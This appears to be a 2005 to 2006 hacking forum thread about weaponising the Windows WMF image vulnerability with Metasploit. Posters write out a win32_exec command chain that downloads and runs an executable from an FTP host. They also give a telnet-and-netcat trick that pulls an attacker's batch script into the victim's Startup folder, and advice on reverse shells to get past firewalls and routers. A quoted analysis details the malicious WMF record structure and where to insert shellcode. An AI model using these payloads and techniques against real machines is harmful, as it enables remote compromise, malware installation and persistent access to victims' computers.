Forums: Wmf Exploit With Download & Exec Shellcode - Forums

the exploit in meta sploit did not contain the download and exec payloads,any body make one ?

if you just downloaded the latest stable version of metasploit,
you are going to need to run the update utility in order to get the latest exploits

i just tried it and it works fine over here

run: MSFUpdate

(might have to run it twice)
(first update might just updates the updater)

This post has been edited by Fractured: 29 December 2005 - 06:43 AM

chkrootkit, on Dec 29 2005, 01:54 AM, said:

you can make one yourself...down&exec,adduser,bindshell...use the metasploit web interface.

This post has been edited by Axl: 29 December 2005 - 10:29 PM

Fractured, on Dec 29 2005, 08:42 AM, said:

i think what he ment was a payload which downloads an executable from a certain location and executes it in victims system.

i haven't developed that kind of payload, but i think this task could be completed by using win32_exec payload.
i am sure if you can set such a long CMD value for win32_exec but in theory it is possible.
just set CMD value to:
echo open>ftp
echo ftp.yoursite.com>>ftp
echo username>>ftp
echo password>>ftp
echo lcd c:\>>ftp
echo binary>>ftp
echo get calc.exe>>ftp
echo bye>>ftp
ftp -s:ftp
erase ftp
c:\calc.exe

all this to a singel line each line seperated by ampersand (&).

I would have tried it out myself, but the win32_exec payload doesn't work with wmf exploit. It could be that i'm just doing something wrong.

If any of you have tried win32_exec with wmf exploit or has any other "download & execute" solutions please feel free to let us know :P
ez

Axl, on Dec 30 2005, 12:24 AM, said:

i'm new in metasploit framework.
can you be little more specific please?
how to do it exactly?

another question is how to use some other non-metasploit payload in metasploit framework?

thanks

so this is the first sucessful sp2 exploit
does the firewall popup or is it already allowed with it being ie

moveez, on Dec 29 2005, 11:30 PM, said:

good idea but...
isn´t it easier to set a regular payload (bindshell or reverseshell) and when u get the shell write the following:
cmd /c start /min telnet.exe -f file.bat HOST 23

where file.bat is a file that will be created and receive input, host is your hostname or IP address.
at host u make a simple script file that can be of any type (VBS,BAT,INF ...ETC) and setup netcat to listen at port 23 and when the connection is made it sends the content of the script file to the target ( nc -v -l -p 23 < script.bat) then u simply type call file.bat n voila all the commands u would have to type would be fast executed. here we suppose telnet.exe is a trusted application by firewalls.

or u could use the above example in the execcommand payload and place the file in the startup folder

cmd /c start /min telnet.exe -f "%allusersprofile%\start menu\programs\startup\file.bat" HOST 23

ps: the -f command line parameter is only available on XP telnet application n (I guess) win2003

well just some examples... use imagination u can do a hell lots of things :lol:

about the Firewall, maybe u could use a dll inject with reverse connection payload to try to bypass the firewall. oh n another thing, XP SP2 pops up a warning asking if u wanna execute files that come from the internet...will the download and exec payload bypass this feature?

This post has been edited by DuDu: 30 December 2005 - 08:34 AM

if the remote system has a firewall , the exploit works ? which payload is better to use ? ... and if the remote system is behind a router , the shell cames to me ?

(sorry for my english, i´m from portugal)

how you can scan those things :\ scan port 8080 yes and then banner grab but wich ones are good? :(

hmm did you read/understand anything? there's nothing to scan, except maybe the shell, which makes no real sense.

hi,
can someone tell me how to do to connect on an other computer with WMF ?

sorry if my english isn't good, i'm french lol

Thx

little hint

the remote user has to open your wmf link and actualy vieuw the pic ;)

okay, but how to do to make connect the remote user on my computer ?

Pino, on Jan 2 2006, 06:08 PM, said:

You can use Metasploit Framework read above posts. Use win32_reverse as the payload that way if they are behind a router you still get a shell.

-toe

Hi folks,
maybe it help us...

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Used with permission by san[at]xfocus.org:
------------------------------------------

The recent wmf vul is really fun, I found some interest things after
analysed it. I attached a very simple wmf file(64 bytes) which can crash
your explorer. You can simply change those 0xcc to your shellcode.

An attach wmf file constructs with a 18 bytes metafile header which
defined as following:

typedef struct _WindowsMetaHeader
{
WORD FileType; /* Type of metafile (0=memory, 1=disk) */
WORD HeaderSize; /* Size of header in WORDS (always 9) */
WORD Version; /* Version of Microsoft Windows used */
DWORD FileSize; /* Total size of the metafile in WORDs */
WORD NumOfObjects; /* Number of objects in the file */
DWORD MaxRecordSize; /* The size of largest record in WORDs */
WORD NumOfParams; /* Not Used (always 0) */
} WMFHEAD;

and two data records which defined as following:

typedef struct _StandardMetaRecord
{
DWORD Size; /* Total size of the record in WORDs */
WORD Function; /* Function number (defined in WINDOWS.H) */
WORD Parameters[]; /* Parameter values passed to function */
} WMFRECORD;

Somethings that we need to attention:

1. FileSize of _WindowsMetaHeader is in WORDs, don't forget to divide 2;
2. the attack file is larger than 64 bytes;
3. the last record always has a function number of 0000h, a Size of
00000003h, and no Parameters array;
4. the attack record has a function number of 0626h, which defined in
wingdi.h. 26h is important, it will flow to Escape function. I found
it will lead to SetAbortProc only the Parameters[0] is 0009h.

.text:77C4B65C loc_77C4B65C: ; CODE XREF: PlayMetaFileRecord+43#j
.text:77C4B65C ; DATA XREF: .text:off_77C769FE#o
.text:77C4B65C push [ebp+uFlags] ; case 0x26
.text:77C4B65F push ebx
.text:77C4B660 call sub_77C4B68A
.text:77C4B665 cmp eax, edi
.text:77C4B667 mov [ebp+var_4], eax
.text:77C4B66A jnz loc_77C4B424
.text:77C4B670 mov ax, [ebx+6]
.text:77C4B674 cmp ax, 0Fh
.text:77C4B678 jnz loc_77C5FC0A ; flow to Escape
...
.text:77C61062 loc_77C61062: ; CODE XREF: Escape+ECB7#j
.text:77C61062 sub edi, 6
.text:77C61065 jz short loc_77C61090 ; it flow to SetAbortProc only the Parameters[0] is 0009h
...
.text:77C543E7 loc_77C543E7: ; CODE XREF: SetAbortProc+54#j
.text:77C543E7 ; SetAbortProc+10720#j
.text:77C543E7 xor eax, eax
.text:77C543E9 mov [esi+14h], edi ; write callback pointer?
...
.text:77C604C8 owned: ; CODE XREF: sub_77C4B09C+1E4#j
.text:77C604C8 mov eax, [eax+14h] ; the pointer
.text:77C604CB cmp eax, ecx
.text:77C604CD jz loc_77C4B286
.text:77C604D3 push ecx
.text:77C604D4 push edi
.text:77C604D5 call eax ; got it

Best Regards
--
san <san[at]xfocus.org>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Regards...
Igor Marcel - Vugo Verbal Killer (VUGO), <vugo"at"hotmail.com>
Information Security Consultant
"Linux is modism, BSD is a life style!"

Awesome, many thanks m8. I actually had managed to find the location - those structs were just what i needed. Cheers.

This post has been edited by mr-rodgers: 04 January 2006 - 01:00 AM